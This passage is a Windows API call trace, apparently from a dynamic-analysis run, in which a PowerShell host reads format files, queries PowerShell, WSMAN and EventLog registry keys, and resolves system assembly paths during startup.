	[0102.053] ReadFile (in: hFile=0x334, lpBuffer=0x3b48200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b48200*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.053] ReadFile (in: hFile=0x334, lpBuffer=0x3b48200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b48200*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.054] ReadFile (in: hFile=0x334, lpBuffer=0x3b48200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b48200*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.054] ReadFile (in: hFile=0x334, lpBuffer=0x3b48200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b48200*, lpNumberOfBytesRead=0xed258*=0x8b4, lpOverlapped=0x0) returned 1
	[0102.054] ReadFile (in: hFile=0x334, lpBuffer=0x3b4761c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b4761c*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0102.054] ReadFile (in: hFile=0x334, lpBuffer=0x3b48200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b48200*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0102.054] SetErrorMode (uMode=0x1) returned 0x1
	[0102.055] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0102.055] SetErrorMode (uMode=0x1) returned 0x1
	[0102.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x334) returned 0x0
	[0102.055] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0102.055] CoTaskMemAlloc (cb=0x5a) returned 0x28a760
	[0102.055] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x28a760, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0102.055] CoTaskMemFree (pv=0x28a760) 
	[0102.055] RegCloseKey (hKey=0x334) returned 0x0
	[0102.056] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x4cc84892, Data2=0xa1b7, Data3=0x49a8, Data4=([0]=0x9d, [1]=0xc2, [2]=0x44, [3]=0x99, [4]=0x15, [5]=0x24, [6]=0xa5, [7]=0xed))) returned 0x0
	[0102.057] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xdd37bfe, Data2=0x9bf4, Data3=0x4580, Data4=([0]=0x87, [1]=0xa3, [2]=0xa5, [3]=0x3e, [4]=0xcf, [5]=0x41, [6]=0x42, [7]=0xa1))) returned 0x0
	[0102.057] SetErrorMode (uMode=0x1) returned 0x1
	[0102.057] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0102.057] SetErrorMode (uMode=0x1) returned 0x1
	[0102.057] GetFileType (hFile=0x334) returned 0x1
	[0102.057] ReadFile (in: hFile=0x334, lpBuffer=0x3b85fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b85fe8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.058] ReadFile (in: hFile=0x334, lpBuffer=0x3b85fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b85fe8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.059] ReadFile (in: hFile=0x334, lpBuffer=0x3b85fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b85fe8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.059] ReadFile (in: hFile=0x334, lpBuffer=0x3b85fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b85fe8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0102.059] ReadFile (in: hFile=0x334, lpBuffer=0x3b85fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b85fe8*, lpNumberOfBytesRead=0xed258*=0xe98, lpOverlapped=0x0) returned 1
	[0102.059] ReadFile (in: hFile=0x334, lpBuffer=0x3b855e8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b855e8*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0102.059] ReadFile (in: hFile=0x334, lpBuffer=0x3b85fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3b85fe8*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0102.060] SetErrorMode (uMode=0x1) returned 0x1
	[0102.060] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0102.060] SetErrorMode (uMode=0x1) returned 0x1
	[0102.060] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x334) returned 0x0
	[0102.060] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0102.060] CoTaskMemAlloc (cb=0x5a) returned 0x28a760
	[0102.060] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x28a760, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0102.060] CoTaskMemFree (pv=0x28a760) 
	[0102.060] RegCloseKey (hKey=0x334) returned 0x0
	[0102.061] VirtualQuery (in: lpAddress=0xebd80, lpBuffer=0xecc40, dwLength=0x30 | out: lpBuffer=0xecc40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0102.061] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x9a2a65af, Data2=0x768c, Data3=0x4857, Data4=([0]=0xaf, [1]=0xda, [2]=0x2c, [3]=0xee, [4]=0xd2, [5]=0x2, [6]=0x9f, [7]=0xcc))) returned 0x0
	[0102.062] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x5a57b391, Data2=0x37a9, Data3=0x49ad, Data4=([0]=0xbf, [1]=0x43, [2]=0xe7, [3]=0xc3, [4]=0x5b, [5]=0xd2, [6]=0xaf, [7]=0xd1))) returned 0x0
	[0102.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0102.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0102.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0102.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0102.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0102.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0102.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0102.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0102.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0102.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0102.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0102.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0102.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0102.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0102.595] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.595] CoTaskMemFree (pv=0x28e180) 
	[0102.597] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.597] CoTaskMemFree (pv=0x28e180) 
	[0102.599] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.599] CoTaskMemFree (pv=0x28e180) 
	[0102.600] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.601] CoTaskMemFree (pv=0x28e180) 
	[0102.707] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.707] CoTaskMemFree (pv=0x28e180) 
	[0102.708] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.709] CoTaskMemFree (pv=0x28e180) 
	[0102.709] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.709] CoTaskMemFree (pv=0x28e180) 
	[0102.714] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4f8 | out: phkResult=0xed4f8*=0x334) returned 0x0
	[0102.716] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed3fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed3f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed3fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed3f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.716] CoTaskMemFree (pv=0x0) 
	[0102.716] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.716] RegEnumValueW (in: hKey=0x334, dwIndex=0x0, lpValueName=0x22b7e0, lpcchValueName=0xed4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0102.716] CoTaskMemFree (pv=0x22b7e0) 
	[0102.716] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.716] RegEnumValueW (in: hKey=0x334, dwIndex=0x1, lpValueName=0x22b7e0, lpcchValueName=0xed4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0102.716] CoTaskMemFree (pv=0x22b7e0) 
	[0102.716] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.716] RegEnumValueW (in: hKey=0x334, dwIndex=0x2, lpValueName=0x22b7e0, lpcchValueName=0xed4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0102.716] CoTaskMemFree (pv=0x22b7e0) 
	[0102.717] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed48c, lpData=0x0, lpcbData=0xed488*=0x0 | out: lpType=0xed48c*=0x1, lpData=0x0, lpcbData=0xed488*=0x8) returned 0x0
	[0102.717] CoTaskMemAlloc (cb=0xc) returned 0x1b3178f0
	[0102.717] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed45c, lpData=0x1b3178f0, lpcbData=0xed458*=0x8 | out: lpType=0xed45c*=0x1, lpData="2.0", lpcbData=0xed458*=0x8) returned 0x0
	[0102.717] CoTaskMemFree (pv=0x1b3178f0) 
	[0102.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed448 | out: phkResult=0xed448*=0x330) returned 0x0
	[0102.869] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed34c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed348*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.870] CoTaskMemFree (pv=0x0) 
	[0102.870] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.870] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x22b7e0, lpcchValueName=0xed3f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed3f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0102.870] CoTaskMemFree (pv=0x22b7e0) 
	[0102.870] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.870] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x22b7e0, lpcchValueName=0xed3f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed3f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0102.870] CoTaskMemFree (pv=0x22b7e0) 
	[0102.870] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.870] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x22b7e0, lpcchValueName=0xed3f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed3f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0102.870] CoTaskMemFree (pv=0x22b7e0) 
	[0102.870] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed3dc, lpData=0x0, lpcbData=0xed3d8*=0x0 | out: lpType=0xed3dc*=0x1, lpData=0x0, lpcbData=0xed3d8*=0x8) returned 0x0
	[0102.870] CoTaskMemAlloc (cb=0xc) returned 0x1b317810
	[0102.870] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed3ac, lpData=0x1b317810, lpcbData=0xed3a8*=0x8 | out: lpType=0xed3ac*=0x1, lpData="2.0", lpcbData=0xed3a8*=0x8) returned 0x0
	[0102.870] CoTaskMemFree (pv=0x1b317810) 
	[0102.871] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.872] CoTaskMemFree (pv=0x28e180) 
	[0102.876] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0102.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0102.877] CoTaskMemFree (pv=0x28e180) 
	[0102.980] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed478 | out: phkResult=0xed478*=0x304) returned 0x0
	[0102.984] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed3ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed3e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed3ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed3e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.984] CoTaskMemFree (pv=0x0) 
	[0102.986] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.986] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.986] CoTaskMemFree (pv=0x22b7e0) 
	[0102.986] CoTaskMemFree (pv=0x0) 
	[0102.986] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.986] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.986] CoTaskMemFree (pv=0x22b7e0) 
	[0102.986] CoTaskMemFree (pv=0x0) 
	[0102.986] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.986] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.986] CoTaskMemFree (pv=0x22b7e0) 
	[0102.986] CoTaskMemFree (pv=0x0) 
	[0102.986] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.986] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.986] CoTaskMemFree (pv=0x22b7e0) 
	[0102.986] CoTaskMemFree (pv=0x0) 
	[0102.986] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.986] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.986] CoTaskMemFree (pv=0x22b7e0) 
	[0102.986] CoTaskMemFree (pv=0x0) 
	[0102.986] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.986] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.987] CoTaskMemFree (pv=0x22b7e0) 
	[0102.987] CoTaskMemFree (pv=0x0) 
	[0102.987] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
